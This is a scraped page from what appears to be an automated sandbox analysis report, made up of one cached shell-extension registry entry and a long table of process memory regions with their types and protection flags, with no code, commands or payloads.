HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{FBF23B40-E3F0-101B-8488-00AA003E56F8} {000214E4-0000-0000-C000-000000000046} 0xFFFF
|
There are 38 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
5F0000
|
remote allocation
|
page read and write
|
||
35AB000
|
heap
|
page read and write
|
||
33D0000
|
direct allocation
|
page read and write
|
||
A22000
|
heap
|
page read and write
|
||
7297000
|
heap
|
page read and write
|
||
2774000
|
trusted library allocation
|
page read and write
|
||
3A10000
|
direct allocation
|
page execute and read and write
|
||
8D8E000
|
stack
|
page read and write
|
||
677A000
|
heap
|
page read and write
|
||
100000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
3A40000
|
direct allocation
|
page execute and read and write
|
||
2ED0000
|
heap
|
page read and write
|
||
2650000
|
heap
|
page read and write
|
||
7FE00000
|
direct allocation
|
page read and write
|
||
28FB000
|
heap
|
page read and write
|
||
4160000
|
direct allocation
|
page execute and read and write
|
||
92D0000
|
heap
|
page read and write
|
||
8C7000
|
heap
|
page read and write
|
||
5650000
|
heap
|
page read and write
|
||
2D60000
|
heap
|
page read and write
|
||
212E000
|
stack
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
1CD0000
|
heap
|
page read and write
|
||
81B0000
|
trusted library allocation
|
page read and write
|
||
5D0000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
6E7000
|
heap
|
page read and write
|
||
C0C000
|
heap
|
page read and write
|
||
76EF000
|
direct allocation
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
32C2000
|
direct allocation
|
page read and write
|
||
7160000
|
trusted library allocation
|
page read and write
|
||
37FF000
|
stack
|
page read and write
|
||
4DE000
|
stack
|
page read and write
|
||
4070000
|
direct allocation
|
page execute and read and write
|
||
26AC000
|
direct allocation
|
page read and write
|
||
42F0000
|
direct allocation
|
page execute and read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2D40000
|
heap
|
page read and write
|
||
9B000
|
stack
|
page read and write
|
||
2E9E000
|
stack
|
page read and write
|
||
1C6000
|
heap
|
page read and write
|
||
71C7000
|
heap
|
page read and write
|
||
6E2000
|
heap
|
page read and write
|
||
4B8E000
|
stack
|
page read and write
|
||
2940000
|
heap
|
page read and write
|
||
30DB000
|
heap
|
page read and write
|
||
78D0000
|
trusted library allocation
|
page read and write
|
||
7228000
|
heap
|
page read and write
|
||
419000
|
unkown
|
page write copy
|
||
7FF000
|
heap
|
page read and write
|
||
35C0000
|
direct allocation
|
page execute and read and write
|
||
2DCC000
|
stack
|
page read and write
|
||
8E3000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
6781000
|
heap
|
page read and write
|
||
104E000
|
unkown
|
page write copy
|
||
37F0000
|
direct allocation
|
page execute and read and write
|
||
78D0000
|
trusted library allocation
|
page read and write
|
||
C97000
|
trusted library allocation
|
page execute and read and write
|
||
35AB000
|
heap
|
page read and write
|
||
CBC000
|
heap
|
page read and write
|
||
73B2000
|
heap
|
page read and write
|
||
4C50000
|
heap
|
page read and write
|
||
9050000
|
trusted library allocation
|
page read and write
|
||
2F29000
|
heap
|
page read and write
|
||
6787000
|
heap
|
page read and write
|
||
CD7000
|
heap
|
page read and write
|
||
7E20000
|
trusted library allocation
|
page read and write
|
||
3BB000
|
stack
|
page read and write
|
||
2697000
|
direct allocation
|
page read and write
|
||
7190000
|
trusted library allocation
|
page read and write
|
||
5FD000
|
stack
|
page read and write
|
||
6ED000
|
heap
|
page read and write
|
||
4170000
|
direct allocation
|
page execute and read and write
|
||
3330000
|
direct allocation
|
page execute and read and write
|
||
C29000
|
heap
|
page read and write
|
||
41E0000
|
direct allocation
|
page execute and read and write
|
||
544000
|
heap
|
page read and write
|
||
2B80000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
DC1000
|
unkown
|
page execute read
|
||
34C4000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
7160000
|
trusted library allocation
|
page read and write
|
||
4BF2000
|
trusted library allocation
|
page read and write
|
||
4EAB000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2F25000
|
heap
|
page read and write
|
||
CD0000
|
heap
|
page read and write
|
||
104E000
|
unkown
|
page write copy
|
||
3FF0000
|
direct allocation
|
page execute and read and write
|
||
2F36000
|
heap
|
page read and write
|
||
642000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
81C5000
|
trusted library allocation
|
page read and write
|
||
4220000
|
direct allocation
|
page execute and read and write
|
||
88E000
|
heap
|
page read and write
|
||
C4E000
|
stack
|
page read and write
|
||
21C0000
|
direct allocation
|
page read and write
|
||
918000
|
heap
|
page read and write
|
||
745B000
|
heap
|
page read and write
|
||
9E8000
|
heap
|
page read and write
|
||
33B0000
|
direct allocation
|
page execute and read and write
|
||
CD9000
|
heap
|
page read and write
|
||
7429000
|
heap
|
page read and write
|
||
341C000
|
direct allocation
|
page read and write
|
||
9E0000
|
heap
|
page read and write
|
||
30C8000
|
heap
|
page read and write
|
||
91E000
|
stack
|
page read and write
|
||
DC0000
|
unkown
|
page readonly
|
||
92F000
|
stack
|
page read and write
|
||
4C00000
|
trusted library allocation
|
page execute and read and write
|
||
1E0000
|
heap
|
page read and write
|
||
383E000
|
stack
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
338F000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2BEC000
|
stack
|
page read and write
|
||
81B0000
|
trusted library allocation
|
page read and write
|
||
21B0000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
484D000
|
stack
|
page read and write
|
||
CD0000
|
heap
|
page read and write
|
||
3B50000
|
direct allocation
|
page execute and read and write
|
||
C9B000
|
trusted library allocation
|
page execute and read and write
|
||
2F18000
|
heap
|
page read and write
|
||
8C9000
|
heap
|
page read and write
|
||
950E000
|
stack
|
page read and write
|
||
1740000
|
heap
|
page read and write
|
||
4440000
|
direct allocation
|
page execute and read and write
|
||
358C000
|
heap
|
page read and write
|
||
316F000
|
stack
|
page read and write
|
||
CBD000
|
heap
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
539F000
|
stack
|
page read and write
|
||
334E000
|
stack
|
page read and write
|
||
4C40000
|
heap
|
page read and write
|
||
2770000
|
heap
|
page read and write
|
||
27C5000
|
heap
|
page read and write
|
||
2F5E000
|
stack
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
1878000
|
heap
|
page read and write
|
||
22BF000
|
direct allocation
|
page read and write
|
||
3D10000
|
direct allocation
|
page execute and read and write
|
||
91B000
|
heap
|
page read and write
|
||
36F1000
|
direct allocation
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
393F000
|
stack
|
page read and write
|
||
2F9F000
|
stack
|
page read and write
|
||
3230000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
2795000
|
heap
|
page read and write
|
||
278B000
|
heap
|
page read and write
|
||
7FF000
|
heap
|
page read and write
|
||
4B0000
|
heap
|
page read and write
|
||
BDA000
|
heap
|
page read and write
|
||
72B0000
|
trusted library allocation
|
page read and write
|
||
227B000
|
direct allocation
|
page read and write
|
||
505D000
|
direct allocation
|
page read and write
|
||
3325000
|
direct allocation
|
page read and write
|
||
4300000
|
direct allocation
|
page execute and read and write
|
||
104E000
|
unkown
|
page read and write
|
||
1484000
|
unkown
|
page execute and read and write
|
||
81CE000
|
trusted library allocation
|
page read and write
|
||
71BA000
|
heap
|
page read and write
|
||
9CE000
|
stack
|
page read and write
|
||
2D10000
|
heap
|
page read and write
|
||
3D00000
|
direct allocation
|
page execute and read and write
|
||
34C4000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
57CD000
|
heap
|
page read and write
|
||
41C000
|
unkown
|
page readonly
|
||
51F0000
|
trusted library allocation
|
page read and write
|
||
460000
|
heap
|
page read and write
|
||
295D000
|
stack
|
page read and write
|
||
264E000
|
stack
|
page read and write
|
||
71B6000
|
heap
|
page read and write
|
||
36E3000
|
direct allocation
|
page read and write
|
||
C2B000
|
heap
|
page read and write
|
||
3EE000
|
stack
|
page read and write
|
||
863000
|
unkown
|
page execute and read and write
|
||
33C5000
|
heap
|
page read and write
|
||
548000
|
heap
|
page read and write
|
||
27A0000
|
heap
|
page read and write
|
||
35A5000
|
heap
|
page read and write
|
||
7450000
|
heap
|
page read and write
|
||
8B5000
|
heap
|
page read and write
|
||
8790000
|
trusted library allocation
|
page read and write
|
||
DC0000
|
unkown
|
page readonly
|
||
76E000
|
stack
|
page read and write
|
||
71BA000
|
heap
|
page read and write
|
||
275D000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
620000
|
heap
|
page read and write
|
||
97000
|
stack
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
C6D000
|
trusted library allocation
|
page execute and read and write
|
||
7FDE0000
|
direct allocation
|
page read and write
|
||
2F41000
|
heap
|
page read and write
|
||
24EB000
|
stack
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
22E0000
|
direct allocation
|
page read and write
|
||
3000000
|
heap
|
page read and write
|
||
78D0000
|
trusted library allocation
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
33C0000
|
heap
|
page read and write
|
||
71D6000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2F3F000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
33F7000
|
direct allocation
|
page read and write
|
||
CD5000
|
heap
|
page read and write
|
||
3880000
|
direct allocation
|
page execute and read and write
|
||
8E9000
|
heap
|
page read and write
|
||
2F39000
|
heap
|
page read and write
|
||
C50000
|
heap
|
page read and write
|
||
2F3B000
|
heap
|
page read and write
|
||
7D2000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
277C000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7443000
|
heap
|
page read and write
|
||
2130000
|
direct allocation
|
page read and write
|
||
8B5000
|
heap
|
page read and write
|
||
9E3000
|
heap
|
page read and write
|
||
7061000
|
heap
|
page read and write
|
||
3D60000
|
direct allocation
|
page execute and read and write
|
||
C80000
|
heap
|
page read and write
|
||
35B0000
|
heap
|
page read and write
|
||
4930000
|
heap
|
page read and write
|
||
2D6B000
|
heap
|
page read and write
|
||
741D000
|
heap
|
page read and write
|
||
104E000
|
unkown
|
page write copy
|
||
2E50000
|
heap
|
page read and write
|
||
2C80000
|
heap
|
page read and write
|
||
2321000
|
direct allocation
|
page read and write
|
||
359B000
|
heap
|
page read and write
|
||
3F20000
|
direct allocation
|
page execute and read and write
|
||
648000
|
heap
|
page read and write
|
||
38E0000
|
direct allocation
|
page execute and read and write
|
||
4190000
|
direct allocation
|
page execute and read and write
|
||
2D62000
|
heap
|
page read and write
|
||
2423000
|
heap
|
page read and write
|
||
2B43000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
3449000
|
direct allocation
|
page read and write
|
||
274F000
|
stack
|
page read and write
|
||
225A000
|
direct allocation
|
page read and write
|
||
3860000
|
direct allocation
|
page execute and read and write
|
||
2C70000
|
heap
|
page read and write
|
||
414E000
|
stack
|
page read and write
|
||
1116000
|
unkown
|
page write copy
|
||
26D7000
|
direct allocation
|
page read and write
|
||
71C6000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
36F0000
|
heap
|
page read and write
|
||
5B3000
|
unkown
|
page read and write
|
||
1117000
|
unkown
|
page write copy
|
||
3DD0000
|
direct allocation
|
page execute and read and write
|
||
2F39000
|
heap
|
page read and write
|
||
BF1000
|
heap
|
page read and write
|
||
3E00000
|
direct allocation
|
page execute and read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
8EC000
|
heap
|
page read and write
|
||
313C000
|
stack
|
page read and write
|
||
32F0000
|
direct allocation
|
page read and write
|
||
2F38000
|
heap
|
page read and write
|
||
638000
|
heap
|
page read and write
|
||
178E000
|
heap
|
page read and write
|
||
72B0000
|
trusted library allocation
|
page read and write
|
||
CCC000
|
heap
|
page read and write
|
||
36C6000
|
direct allocation
|
page read and write
|
||
900000
|
heap
|
page read and write
|
||
2BBA000
|
heap
|
page read and write
|
||
57E0000
|
heap
|
page read and write
|
||
71B7000
|
heap
|
page read and write
|
||
3DF0000
|
direct allocation
|
page execute and read and write
|
||
5053000
|
heap
|
page read and write
|
||
2520000
|
direct allocation
|
page read and write
|
||
111A000
|
unkown
|
page write copy
|
||
3C10000
|
direct allocation
|
page execute and read and write
|
||
C60000
|
trusted library allocation
|
page read and write
|
||
3740000
|
direct allocation
|
page execute and read and write
|
||
2EA0000
|
heap
|
page read and write
|
||
A2A000
|
heap
|
page read and write
|
||
722B000
|
heap
|
page read and write
|
||
550000
|
heap
|
page read and write
|
||
33A7000
|
direct allocation
|
page execute and read and write
|
||
C25000
|
heap
|
page read and write
|
||
45C3000
|
direct allocation
|
page read and write
|
||
A60000
|
heap
|
page read and write
|
||
908E000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
6640000
|
direct allocation
|
page execute and read and write
|
||
17CE000
|
heap
|
page read and write
|
||
7493000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
CD4000
|
heap
|
page read and write
|
||
2F0E000
|
stack
|
page read and write
|
||
7EA000
|
heap
|
page read and write
|
||
71B0000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
A20000
|
heap
|
page read and write
|
||
CDA000
|
heap
|
page read and write
|
||
3F80000
|
direct allocation
|
page execute and read and write
|
||
2BF0000
|
heap
|
page read and write
|
||
111B000
|
unkown
|
page readonly
|
||
2ECE000
|
stack
|
page read and write
|
||
57E6000
|
heap
|
page read and write
|
||
5B8000
|
heap
|
page read and write
|
||
9D0000
|
heap
|
page read and write
|
||
2236000
|
direct allocation
|
page read and write
|
||
70E000
|
stack
|
page read and write
|
||
91E000
|
heap
|
page read and write
|
||
CD5000
|
heap
|
page read and write
|
||
490000
|
heap
|
page read and write
|
||
111A000
|
unkown
|
page write copy
|
||
3D70000
|
direct allocation
|
page execute and read and write
|
||
73C000
|
heap
|
page read and write
|
||
1864000
|
heap
|
page read and write
|
||
61E01000
|
unkown
|
page execute read
|
||
DC0000
|
unkown
|
page readonly
|
||
74AD000
|
heap
|
page read and write
|
||
A86000
|
unkown
|
page execute and write copy
|
||
8F7000
|
heap
|
page read and write
|
||
223D000
|
direct allocation
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
44CC000
|
direct allocation
|
page read and write
|
||
745B000
|
heap
|
page read and write
|
||
2795000
|
heap
|
page read and write
|
||
8D4E000
|
stack
|
page read and write
|
||
2799000
|
heap
|
page read and write
|
||
2F26000
|
heap
|
page read and write
|
||
261E000
|
stack
|
page read and write
|
||
2219000
|
direct allocation
|
page read and write
|
||
3540000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
7FD88000
|
direct allocation
|
page read and write
|
||
7FD0E000
|
direct allocation
|
page read and write
|
||
CCA000
|
heap
|
page read and write
|
||
52BF000
|
stack
|
page read and write
|
||
7FDDE000
|
direct allocation
|
page read and write
|
||
30E2000
|
heap
|
page read and write
|
||
2B4E000
|
heap
|
page read and write
|
||
3A50000
|
direct allocation
|
page execute and read and write
|
||
502000
|
unkown
|
page write copy
|
||
181AB870000
|
heap
|
page read and write
|
||
3A20000
|
direct allocation
|
page execute and read and write
|
||
5B0000
|
heap
|
page read and write
|
||
3500000
|
direct allocation
|
page execute and read and write
|
||
71C6000
|
heap
|
page read and write
|
||
1AAE000
|
stack
|
page read and write
|
||
28F7000
|
heap
|
page read and write
|
||
2D20000
|
heap
|
page read and write
|
||
7B4F000
|
stack
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
960000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
28F0000
|
heap
|
page read and write
|
||
2D5A000
|
heap
|
page read and write
|
||
510F000
|
stack
|
page read and write
|
||
3FE0000
|
direct allocation
|
page execute and read and write
|
||
2795000
|
heap
|
page read and write
|
||
211BCEC000
|
stack
|
page read and write
|
||
8790000
|
trusted library allocation
|
page read and write
|
||
2C30000
|
heap
|
page read and write
|
||
8F4000
|
heap
|
page read and write
|
||
34E0000
|
direct allocation
|
page execute and read and write
|
||
6777000
|
heap
|
page read and write
|
||
AAB000
|
heap
|
page read and write
|
||
CDB000
|
heap
|
page read and write
|
||
176E000
|
stack
|
page read and write
|
||
28DD000
|
stack
|
page read and write
|
||
8C4C000
|
stack
|
page read and write
|
||
43F0000
|
direct allocation
|
page execute and read and write
|
||
21E0000
|
heap
|
page read and write
|
||
307E000
|
stack
|
page read and write
|
||
17BF000
|
heap
|
page read and write
|
||
8E8000
|
unkown
|
page execute and read and write
|
||
40A0000
|
direct allocation
|
page execute and read and write
|
||
7CE000
|
stack
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
2291000
|
direct allocation
|
page read and write
|
||
4B0E000
|
stack
|
page read and write
|
||
24E0000
|
direct allocation
|
page read and write
|
||
34C5000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7447000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
773C000
|
direct allocation
|
page read and write
|
||
278B000
|
heap
|
page read and write
|
||
722000
|
heap
|
page read and write
|
||
4BE0000
|
heap
|
page read and write
|
||
50CE000
|
stack
|
page read and write
|
||
1111000
|
unkown
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
BF2000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
CD0000
|
heap
|
page read and write
|
||
32BB000
|
direct allocation
|
page read and write
|
||
7E6000
|
heap
|
page read and write
|
||
26C2000
|
direct allocation
|
page read and write
|
||
303C000
|
stack
|
page read and write
|
||
7184000
|
trusted library allocation
|
page read and write
|
||
C85000
|
heap
|
page read and write
|
||
2795000
|
heap
|
page read and write
|
||
BE0000
|
heap
|
page read and write
|
||
269E000
|
direct allocation
|
page read and write
|
||
2CCE000
|
stack
|
page read and write
|
||
888000
|
unkown
|
page execute and write copy
|
||
2F94000
|
heap
|
page read and write
|
||
274D000
|
trusted library allocation
|
page read and write
|
||
37A0000
|
direct allocation
|
page execute and read and write
|
||
544000
|
heap
|
page read and write
|
||
27BD000
|
stack
|
page read and write
|
||
50D000
|
unkown
|
page read and write
|
||
2F16000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
745F000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
278B000
|
heap
|
page read and write
|
||
2795000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
1630000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
3F70000
|
direct allocation
|
page execute and read and write
|
||
3090000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
3100000
|
heap
|
page read and write
|
||
438000
|
stack
|
page read and write
|
||
2A80000
|
heap
|
page read and write
|
||
2794000
|
trusted library allocation
|
page read and write
|
||
451B000
|
direct allocation
|
page read and write
|
||
2F14000
|
heap
|
page read and write
|
||
4D7F000
|
stack
|
page read and write
|
||
43C0000
|
direct allocation
|
page execute and read and write
|
||
4A4F000
|
stack
|
page read and write
|
||
2F10000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
717000
|
heap
|
page read and write
|
||
3570000
|
direct allocation
|
page execute and read and write
|
||
44A0000
|
direct allocation
|
page read and write
|
||
66E000
|
stack
|
page read and write
|
||
458B000
|
direct allocation
|
page read and write
|
||
CCC000
|
heap
|
page read and write
|
||
186E000
|
stack
|
page read and write
|
||
678A000
|
heap
|
page read and write
|
||
1052000
|
unkown
|
page readonly
|
||
1052000
|
unkown
|
page readonly
|
||
7FE43000
|
direct allocation
|
page read and write
|
||
34D5000
|
heap
|
page read and write
|
||
22A9000
|
direct allocation
|
page read and write
|
||
358D000
|
heap
|
page read and write
|
||
6ED000
|
heap
|
page read and write
|
||
41F0000
|
direct allocation
|
page execute and read and write
|
||
111A000
|
unkown
|
page write copy
|
||
8B5000
|
heap
|
page read and write
|
||
725000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
3520000
|
direct allocation
|
page execute and read and write
|
||
921000
|
heap
|
page read and write
|
||
344D000
|
direct allocation
|
page read and write
|
||
887000
|
heap
|
page read and write
|
||
6E2000
|
heap
|
page read and write
|
||
663E000
|
direct allocation
|
page read and write
|
||
3340000
|
direct allocation
|
page execute and read and write
|
||
4BDE000
|
stack
|
page read and write
|
||
895000
|
heap
|
page read and write
|
||
A10000
|
heap
|
page read and write
|
||
3313000
|
direct allocation
|
page read and write
|
||
6F3000
|
heap
|
page read and write
|
||
7182000
|
trusted library allocation
|
page read and write
|
||
2BDE000
|
stack
|
page read and write
|
||
7374000
|
heap
|
page read and write
|
||
2420000
|
heap
|
page read and write
|
||
2761000
|
heap
|
page read and write
|
||
C25000
|
heap
|
page read and write
|
||
40E0000
|
direct allocation
|
page execute and read and write
|
||
7400000
|
heap
|
page read and write
|
||
A40000
|
heap
|
page read and write
|
||
178B000
|
heap
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
35A5000
|
heap
|
page read and write
|
||
902000
|
heap
|
page read and write
|
||
4623000
|
direct allocation
|
page read and write
|
||
1111000
|
unkown
|
page read and write
|
||
42A0000
|
direct allocation
|
page execute and read and write
|
||
C25000
|
heap
|
page read and write
|
||
8A3E000
|
stack
|
page read and write
|
||
2220000
|
direct allocation
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2F5E000
|
stack
|
page read and write
|
||
7174000
|
trusted library allocation
|
page read and write
|
||
2AED000
|
stack
|
page read and write
|
||
70CF000
|
stack
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
2D5A000
|
heap
|
page read and write
|
||
7FE11000
|
direct allocation
|
page read and write
|
||
71D7000
|
heap
|
page read and write
|
||
2750000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
4BFE000
|
stack
|
page read and write
|
||
3331000
|
direct allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
513000
|
unkown
|
page readonly
|
||
544000
|
heap
|
page read and write
|
||
26C9000
|
direct allocation
|
page read and write
|
||
8D4000
|
heap
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
73BE000
|
heap
|
page read and write
|
||
CE0000
|
heap
|
page read and write
|
||
568E000
|
heap
|
page read and write
|
||
42C0000
|
direct allocation
|
page execute and read and write
|
||
6F5000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
81B0000
|
trusted library allocation
|
page read and write
|
||
43A0000
|
direct allocation
|
page execute and read and write
|
||
17E2000
|
heap
|
page read and write
|
||
1ED000
|
stack
|
page read and write
|
||
4410000
|
direct allocation
|
page execute and read and write
|
||
4A70000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
111B000
|
unkown
|
page readonly
|
||
70F000
|
heap
|
page read and write
|
||
3C70000
|
direct allocation
|
page execute and read and write
|
||
2328000
|
direct allocation
|
page read and write
|
||
6D1000
|
heap
|
page read and write
|
||
1116000
|
unkown
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
7FE3C000
|
direct allocation
|
page read and write
|
||
71C2000
|
heap
|
page read and write
|
||
705000
|
heap
|
page read and write
|
||
7FC10000
|
direct allocation
|
page read and write
|
||
81B0000
|
trusted library allocation
|
page read and write
|
||
22FD000
|
direct allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
1856000
|
heap
|
page read and write
|
||
71C0000
|
heap
|
page read and write
|
||
1878000
|
heap
|
page read and write
|
||
925000
|
unkown
|
page execute and read and write
|
||
3436000
|
direct allocation
|
page read and write
|
||
26B1000
|
trusted library allocation
|
page read and write
|
||
49BF000
|
stack
|
page read and write
|
||
1FA64B10000
|
heap
|
page read and write
|
||
1AD000
|
stack
|
page read and write
|
||
53C000
|
stack
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
2795000
|
heap
|
page read and write
|
||
8D1000
|
heap
|
page read and write
|
||
2D30000
|
heap
|
page read and write
|
||
2D5E000
|
heap
|
page read and write
|
||
1F8000
|
heap
|
page read and write
|
||
3970000
|
direct allocation
|
page execute and read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
722E000
|
heap
|
page read and write
|
||
24AE000
|
stack
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
2161000
|
direct allocation
|
page read and write
|
||
26B4000
|
direct allocation
|
page read and write
|
||
8790000
|
trusted library allocation
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
61E9E000
|
unkown
|
page write copy
|
||
CBC000
|
heap
|
page read and write
|
||
7190000
|
trusted library allocation
|
page read and write
|
||
226B000
|
direct allocation
|
page read and write
|
||
1111000
|
unkown
|
page read and write
|
||
7EB000
|
heap
|
page read and write
|
||
40F0000
|
direct allocation
|
page execute and read and write
|
||
3DC0000
|
direct allocation
|
page execute and read and write
|
||
2670000
|
trusted library allocation
|
page read and write
|
||
3E90000
|
direct allocation
|
page execute and read and write
|
||
540000
|
heap
|
page read and write
|
||
3580000
|
direct allocation
|
page execute and read and write
|
||
3790000
|
direct allocation
|
page execute and read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7E20000
|
trusted library allocation
|
page read and write
|
||
22F6000
|
direct allocation
|
page read and write
|
||
6B4C000
|
stack
|
page read and write
|
||
DC0000
|
unkown
|
page readonly
|
||
2E26000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
4EA0000
|
direct allocation
|
page read and write
|
||
7F7C000
|
stack
|
page read and write
|
||
44A0000
|
direct allocation
|
page read and write
|
||
2C3E000
|
stack
|
page read and write
|
||
A1AE000
|
stack
|
page read and write
|
||
2F27000
|
heap
|
page read and write
|
||
728C000
|
stack
|
page read and write
|
||
3B20000
|
direct allocation
|
page execute and read and write
|
||
36B1000
|
trusted library allocation
|
page read and write
|
||
2690000
|
trusted library allocation
|
page read and write
|
||
3550000
|
heap
|
page read and write
|
||
8E8E000
|
stack
|
page read and write
|
||
6C7000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
35A5000
|
heap
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
4090000
|
direct allocation
|
page execute and read and write
|
||
267F000
|
stack
|
page read and write
|
||
35E0000
|
direct allocation
|
page execute and read and write
|
||
6E2E000
|
stack
|
page read and write
|
||
318E000
|
stack
|
page read and write
|
||
1116000
|
unkown
|
page write copy
|
||
1FA64A50000
|
heap
|
page read and write
|
||
1DB5000
|
heap
|
page read and write
|
||
3530000
|
direct allocation
|
page execute and read and write
|
||
6EE000
|
heap
|
page read and write
|
||
4050000
|
heap
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
86D0000
|
trusted library allocation
|
page read and write
|
||
2289000
|
direct allocation
|
page read and write
|
||
4E4F000
|
stack
|
page read and write
|
||
29DC000
|
stack
|
page read and write
|
||
9FD000
|
stack
|
page read and write
|
||
2F30000
|
heap
|
page read and write
|
||
3050000
|
heap
|
page read and write
|
||
996000
|
heap
|
page read and write
|
||
32F3000
|
direct allocation
|
page read and write
|
||
35A5000
|
heap
|
page read and write
|
||
8FE000
|
stack
|
page read and write
|
||
29AE000
|
stack
|
page read and write
|
||
8ECE000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
direct allocation
|
page execute and read and write
|
||
7225000
|
heap
|
page read and write
|
||
6771000
|
heap
|
page read and write
|
||
133F000
|
stack
|
page read and write
|
||
172E000
|
stack
|
page read and write
|
||
2D29000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
5E6000
|
unkown
|
page readonly
|
||
2285000
|
direct allocation
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
AD4000
|
heap
|
page read and write
|
||
635000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
9EA000
|
unkown
|
page execute and read and write
|
||
181AB994000
|
heap
|
page read and write
|
||
4F0E000
|
stack
|
page read and write
|
||
3BD0000
|
direct allocation
|
page execute and read and write
|
||
4150000
|
direct allocation
|
page execute and read and write
|
||
2DB0000
|
heap
|
page read and write
|
||
222F000
|
direct allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
11CC000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7FD90000
|
direct allocation
|
page read and write
|
||
CA2000
|
heap
|
page read and write
|
||
8DD000
|
stack
|
page read and write
|
||
7FE20000
|
direct allocation
|
page read and write
|
||
580000
|
heap
|
page read and write
|
||
3A60000
|
direct allocation
|
page execute and read and write
|
||
704000
|
heap
|
page read and write
|
||
61E89000
|
unkown
|
page read and write
|
||
3830000
|
direct allocation
|
page execute and read and write
|
||
C86000
|
trusted library allocation
|
page execute and read and write
|
||
27C0000
|
heap
|
page read and write
|
||
2DF6000
|
heap
|
page read and write
|
||
81B0000
|
trusted library allocation
|
page read and write
|
||
CD0000
|
heap
